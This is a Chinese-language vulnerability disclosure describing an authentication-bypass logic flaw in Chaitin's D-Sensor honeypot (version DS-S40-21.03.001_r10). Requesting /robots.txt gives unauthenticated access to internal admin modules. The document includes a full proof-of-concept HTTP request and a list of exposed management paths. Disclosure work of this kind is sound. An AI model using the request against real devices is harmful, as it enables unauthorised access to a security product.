长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

目录

长亭D-Sensor谛听蜜罐逻辑缺陷漏洞

官网

漏洞描述

漏洞URL

影响版本

过程

修复建议

---

官网

https://www.chaitin.cn/zh/    长亭科技

漏洞描述

通过访问该网站系统，使用/robots.txt路径发生跳转现象，进行抓包测试；发现可在未授权的情况下进行操作系统内部的各个模块，同时泄露模块的URL敏感路径；

漏洞URL

https://8.1.1.8/robots.txt

影响版本

DS-S40-21.03.001_r10

过程

访问https://8.1.1.8/login

 

访问https://8.1.1.8/robots.txt因出现跳转情况，抓包进行测试，可观察到系统内部的模块分布信息

 

 

POC如下

GET /robots.txt HTTP/1.1 Host: XXXX Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: csrftoken=2KUh0dArZGhpXu9WULYDyKSqfkEObtbOe16NqVvpuXM8CVoo4yqfuhwOEuw9rVeM

 

 

点击发送forward模块

 

 

可点击各个模块观察系统内容和URL的目录信息

 

 

目录信息如下：

 

/setting/update

/setting/whitelist

/user/manage

/agents/list

/node/honeynets

/event_log/analysis

/summary/summary

修复建议

进行权限逻辑处理；